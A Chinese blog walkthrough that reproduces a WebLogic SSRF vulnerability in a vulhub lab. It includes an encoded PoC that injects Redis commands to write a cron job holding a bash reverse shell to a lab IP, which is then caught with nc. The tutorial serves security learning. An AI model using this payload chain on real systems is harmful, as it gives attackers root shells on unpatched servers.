Weblogic-SSRF 漏洞复现

0x01 环境搭建

 

  我这里使用的是vulhub,它几乎包含了所有的漏洞环境。(建议安装在ubuntu上)

  有需要的小伙伴来企鹅群自取。

  安装好vulhub之后需要cd 到weblogic ssrf 目录下

  然后启动测试环境

  docker-compose build

  docker-compose up -d

 

此次环境搭建在Ubuntu上

 

0x02 漏洞简介

 

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

 

0x03 影响版本

  

weblogic 版本10.0.2

weblogic 版本10.3.6

 

0x04 漏洞复现

 

访问http://虚拟机-ip:7001/uddiexplorer/

 Weblogic-SSRF  漏洞复现

 

抓包发送到重放攻击

 

 Weblogic-SSRF  漏洞复现

 

 

查看Ubuntu -redis 的ip

Weblogic-SSRF  漏洞复现

然后改包,注意图中注释

Weblogic-SSRF  漏洞复现

 

 

Poc:http://172.18.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.15.131%2F1236%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

红色部分为:redis ip

黄色部分为:ubuntu虚拟机 ip

 

然后发包,

 

此时继续打开Ubuntu 使用nc反弹shell

 Weblogic-SSRF  漏洞复现

也可以使用其他虚拟机来弹shell,

具体姿势还没研究,研究过的小伙伴可以告告我呦

 

企鹅群:1045867209

欢迎各位表哥

本文欢迎转载。 如转载请务必注明出处。 觉得写的不错的可以右侧打赏一手。 群在上边欢迎大家来撩。

 

 

上一篇:mongodb数据库的改操作


下一篇:浅谈SSRF